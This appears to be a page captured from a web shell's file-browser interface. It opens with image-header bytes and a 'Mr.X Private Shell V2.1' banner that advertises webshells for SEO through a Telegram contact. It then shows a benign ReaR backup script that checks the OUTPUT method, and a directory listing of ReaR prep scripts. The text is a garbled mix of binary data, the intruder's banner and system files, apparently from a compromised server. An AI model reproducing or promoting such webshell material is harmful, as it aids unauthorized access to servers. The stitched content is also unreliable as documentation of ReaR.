����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# For "rear mkbackup/mkrescue/mkbackuponly/mkopalpba"
# (i.e. for all workflows that run the 'prep' stage)
# check that the OUTPUT method is actually implemented
# i.e. check that a usr/share/rear/output/$OUTPUT directory exists
# and error out when an OUTPUT method seems to be not supported
# to ensure that the user cannot specify a non-working OUTPUT in /etc/rear/local.conf
# see https://github.com/rear/rear/issues/2501
# and cf. usr/share/rear/prep/default/035_valid_backup_methods.sh
if ! test -d "$SHARE_DIR/output/$OUTPUT" ; then
Error "The OUTPUT method '$OUTPUT' is not supported (no $SHARE_DIR/output/$OUTPUT directory)"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 005_remove_workflow_conf.sh | File | 479 B | 0644 |
|
| 020_translate_url.sh | File | 1.71 KB | 0644 |
|
| 030_translate_tape.sh | File | 932 B | 0644 |
|
| 035_valid_backup_methods.sh | File | 988 B | 0644 |
|
| 036_valid_output_methods.sh | File | 643 B | 0644 |
|
| 040_check_backup_and_output_scheme.sh | File | 4.17 KB | 0644 |
|
| 050_check_keep_old_output_copy_var.sh | File | 304 B | 0644 |
|
| 100_init_workflow_conf.sh | File | 453 B | 0644 |
|
| 320_include_uefi_env.sh | File | 4.51 KB | 0644 |
|
| 321_EFISTUB_check_uefi_env.sh | File | 486 B | 0644 |
|
| 330_include_uefi_tools.sh | File | 577 B | 0644 |
|
| 340_include_password_tools.sh | File | 270 B | 0644 |
|
| 380_include_opal_tools.sh | File | 540 B | 0644 |
|
| 390_include_python.sh | File | 4.41 KB | 0644 |
|
| 400_save_directories.sh | File | 9.66 KB | 0644 |
|
| 490_store_write_protect_settings.sh | File | 469 B | 0644 |
|
| 989_check_for_restore_esp.sh | File | 596 B | 0644 |
|
| 990_verify_empty_rootfs.sh | File | 1.54 KB | 0644 |
|